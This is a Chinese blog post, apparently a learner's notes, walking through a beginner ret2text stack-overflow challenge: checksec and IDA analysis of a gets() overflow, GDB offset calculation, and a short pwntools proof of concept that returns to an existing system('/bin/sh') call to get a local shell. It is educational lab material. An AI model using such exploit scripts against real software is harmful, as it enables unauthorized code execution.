PWN初体验之ret2text

已于 2022-08-05 00:32:49 修改
阅读量663 收藏 6
点赞数 2
分类专栏: IOT漏洞挖掘学习笔记 文章标签: ubuntu linux 运维
于 2022-08-04 22:11:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43137410/article/details/126167548
版权

0x00 序

​ "Hello,World!"的浪漫可能只有直男才懂!在1就是1、0就是0的非黑即白的元宇宙世界里一定只会有少年的足迹!天真永不消逝,浪漫至死不渝!生命不熄,学习不止!致每一个有梦想却被现实抛弃和质疑的追梦人!

​ 言归正传,最近在学习二进制漏洞的挖掘,今天就拿一个demo做一个return to text的分析。

0x01 文件分析

​ Demo是一个名为ret2text的文件,在Ubuntu中使用file命令查看文件信息。

在这里插入图片描述

  • 是一个ELF可执行文件
  • 32位
  • 小端序
  • i386架构

​ 使用checksec查看保护开启情况

在这里插入图片描述

  • RELRO开启Partial模式
  • 未开启金丝雀保护
  • 堆栈不可执行
  • 未开启内存地址随机化

0x02 静态分析

​ 使用32位IDA打开ELF文件

在这里插入图片描述

查看分析伪代码

在这里插入图片描述

  • 定义字符变量s。
  • 调用gets函数获取输入并存到s中。
  • 在调用gets函数时并未对输入进行长度的判断,存在可溢出点。

查看汇编代码

在这里插入图片描述

  • 在调用gets函数之前将参数s的地址赋值给了eax
  • 并将s的地址作为gets函数的参数压住栈中

0x03 动态调试

​ 在Ubuntu使用GDB调试文件。

在这里插入图片描述

​ 将断点下到main函数,运行文件。

在这里插入图片描述

​ 单步调试到调用gets函数时。

在这里插入图片描述

  • 此时eax的值(参数s的地址)为0xffffd0bc。

使用命令stack查看函数调用栈的情况。

在这里插入图片描述

  • esp指针的地址为0xffffd0a0
  • ebp指针的地址为0xffffd128
  • 那么函数返回的地位就是0xffffd12c
  • s的位置在0xffffd0bc。

测试输入覆盖

在这里插入图片描述

  • 可以完成栈数据的覆盖

计算输入点到返回地址的长度

在这里插入图片描述

  • 0x70的长度可以覆盖到返回地址

测试

在这里插入图片描述

  • 成功覆盖到返回值地址
  • 可再用四个字节即可覆盖返回地址

0x04 查找代码可执行点

​ 在IDA查询是否有system函数可以利用。

在这里插入图片描述

  • 文件调用了system()函数
  • 并在调用时直接执行了/bin/sh命令

​ 查找命令执行的地址

在这里插入图片描述

  • 找到引用地址0x0804863A

0x05 POC编写

from pwn import *

context.arch = "i386"

p = process("./ret2text")
elf = ELF("./ret2text")
libc = ELF("/lib/i386-linux-gnu/libc-2.27.so")


padding = "a"*0x70
retaddr = 0x0804863A
payload = padding + p32(retaddr)

p.sendlineafter("do you know anything?\n",payload)
p.interactive()
  • 该POC脚本为本地利用,pwntools也提供远程利用方式。
  • 使用了相对地址,脚本与文件放在同一目录下。

0x06 运行脚本

在这里插入图片描述

  • 成功执行命令
撒旦姥爷的黑山羊คิดถึง
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn小白入门03---ret2text
weixin_45943522的博客
02-21 6212
什么是栈溢出: 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变(比如gets函数,他不会去验证你输入的值的长度,通过这个函数,你可以往一个本身大小为4字节的数组中填入任意大小的数据,如果填入8字节的数据,将会导致栈溢出,进而程序报错)。就像是往杯子里倒水,水满了溢出来最后烫到你一样。 最简单的栈溢出利用:ret2text 通过栈溢出修改call指令保存在栈上的返回地址(eip的值),这样cpu执行ret指令的时候,就会将被修改的值从栈上取
入门pwn题目ret2text
03-26
入门pwn题目ret2text
pwn笔记 - ret2text - 函数传参(x86&x64)
weixin_44227244的博客
09-06 3155
pwn笔记 - ret2text - 函数传参
pwn ret2text
小龙在线
09-12 681
首先把ret2text用IDA打开: 64位ELF文件。 进入main函数,F5反编译,双击vulnerable函数,进入: 发现溢出点。 函数窗口列表,查看success,发现shell: 进入IDA普通视图,双击左侧success函数,查看success地址,是400566。 写pwn exp.py: from pwn import * sh = process("./ret2text") payload = b"a"*0x10 + b"b"*0x8 + p64(0x400566) sh.
pwn入门(2):ROP攻击的原理,缓冲区溢出漏洞利用(ret2text+ret2shellcode)
Bossfrank的博客
04-18 2940
本节将介绍基本的ROP(Return-Oriented Programming,返回导向编程的)的攻击原理、二进制程序的保护机制,并通过两个实例ret2text、ret2shellcode,为读者简介基本的ROP攻击过程。本节所使用的实例可在CTF wiki上进行下载。
pwn入门之ret2text
wangxunyu6的博客
01-07 1189
重点来了:存在gets函数,先让我们了解一下gets函数,它可以无限读入数据,造成栈溢出。观察到s变量距离ebp有0x28的距离,对于这个题来说栈结构为先读入s变量然后下面是ebp然后才是返回地址,那么我们就有思路了,往s变量里面填充垃圾数据直到返回地址把返回地址改为我们需要的flag的位置。第四行:这是我们人为构造的代码数据,根据思路填充垃圾数据0x28个,因为这是32位elf文件所以需要再加上4,p32(flag)即为我们的返回地址。0不用管buf是我们输入数据的地方,0x32是能写入的字节数。
pwn学习笔记(2)ret_2_text_or_shellcode
最新发布
qq_66013948的博客
02-04 1303
​ ax寄存器:通用寄存器,可用于存放多种数据​ bp寄存器:存放的是栈帧的栈底地址​ sp寄存器:存放的是栈顶的地址​ 栈帧是存储函数的一些信息的地方,栈帧存储有函数的局部变量,传递给子函数的实际参数,父函数的地址以及上一个栈帧栈底的地址,大致情况如下:​ 在函数调用的过程中,首先会讲bp寄存器的值进行压栈,以方便在恢复的时候恢复栈底寄存器的值,再之后,会按顺序将局部变量压栈,最后是子函数的实际参数,会按照先入栈的后出栈,从最后一个实际参数先入栈再到第一个实际参数,比如函数a(int a ,
pwn07.ret2syscall例题
11-11
ret2syscall例题
ret2libc2pwn 入门题
02-11
pwn 入门题
ret2libc1pwn 入门题
02-11
pwn 入门题
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
浅谈 ret2text
akdelt的博客
01-21 946
而此时栈顶指针指向 ‘/bin/sh’ 的地址,于是 ‘/bin/sh’ 被放入 rdi 中,然后执行 ret,此时后门函数地址顶上来了,于是就 ret 到了 func 的地址 (这就是为什么找的是pop rdi;我瞎猜的,不然不好解释)而拿去参数也是同过 EBP 偏移量来实现的,本来有返回地址时通过 [EBP+8] 来拿参数一,但是因为没有返回地址 此时 EBP 和 参数相邻相差 4 个字节,所以 EBP + 8 就不是参数一的地址了。前六个参数依次存放于rdi,rsi,rdx,rcx,r8,r9中。
ROP初探之ret2text
chlet的博客
05-05 495
ROP即返回导向编程是一种计算机安全利用技术,它允许攻击者在存在诸如可执行空间保护和代码签名等安全防御的情况下执行代码。在这种技术中,攻击者通过控制调用栈来劫持程序控制流,并执行机器内存中已存在的精心选择的机器指令序列,称为“gadgets”。每个gadgets通常以返回指令结束,并位于现有程序和/或共享库代码中的子程序内。这些gadgets串联在一起,允许攻击者在使用阻止更简单攻击的防御的机器上执行任意操作。
ctf-wiki rop ret2text
weixin_55885866的博客
05-09 222
观察gets函数写入的数组地址为[esp+1ch],思路为查找esp为多少,因为当前是靠着esp定位地址。查看secure函数中获取到shell的地址(0804863a)2.拿到文件在kali linux中用ida打开。推断距离返回地址偏移的地址为:0x6c+4。于是字符串(esp+1ch)的地址为。推断距离edp的地址为:0x6c。1.下载ret2text文件。获取目标机器shell。
基础ROP之:ret2text,ret2libc,ret2syscall,ret2shellcode
WdIg-2023的博客
01-30 1058
在上一篇文章中学习了gdb和pwntools的基本使用后,这篇文章来带领大家入门pwn,包括:ret2text,ret2libc,ret2syscall,ret2shellcode。
栈溢出实例--笔记一(ret2text
一只青木呀
08-01 1732
栈溢出实例1、什么是栈溢出?2、栈结构3、栈溢出需要解决的问题3.1、解决如何跳转的问题3.2、跳转到哪里去?4、实战 1、什么是栈溢出? 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致栈中与其相邻的变量的值被改变。 2、栈结构 3、栈溢出需要解决的问题 在我们知道什么是栈溢出以及了解了栈的结构之后,我们就可以开始通过栈溢出破坏栈结构。 在破坏栈结构的时候,我们需要注意两个问题: 1、如何跳转? 2、跳转到哪里去? 3.1、解决如何跳转的问题 在上面栈结构的图中
二进制漏洞挖掘之ret2text栈溢出
brucexia的专栏
01-31 628
(2)执行“gcc -m32 -fno-stack-protector ret2text.c -o ret2text”命令,编译程序,再使用gdb调试程序,使程序运行到read函数,执行“cyclic 200”命令,生成200个字符。执行“python ret2text.py”命令,运行脚本,获取系统shell,再执行“ls”命令,测试shell能否正常使用,结果如图11-32所示。由图可知,ebp地址存储的字符为“eaaa”,执行“cyclic -l eaaa”,结果如图11-30所示。
[二进制安全学习]ret2text
Y4tacker的博客
07-12 1272
文章目录写在前面前置小知识bss段data段text段heapstackret2text参考链接 写在前面 已经学了一小段时间二进制了,以后慢慢确定一个深入的方向吧,开冲 前置小知识 bss段 bss段(bss segment)通常是指用来存放程序中未初始化的全局变量的一块内存区域。 bss是英文Block Started by Symbol的简称。 bss段属于静态内存分配。 比如 int a; data段 数据段(data segment)通常是指用来存放程序中已初始化的全局变量的一块内存区域。 数据
pwn-栈溢出】— ret2text
weixin_43988488的博客
03-19 543
使用checksec检查程序的架构以及保护情况寻找程序漏洞函数,比如如gets,scanf等计算目标变量的在堆栈中与栈底(32:ebp,64:rbp)的之间偏移查看程序导入表,观察表中是否已导入可利用的函数,比如system,execve等分析是否有字符串/bin/sh,将它作为system的参数在此程序中,它直接提供一个后门函数,供我们使用。
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值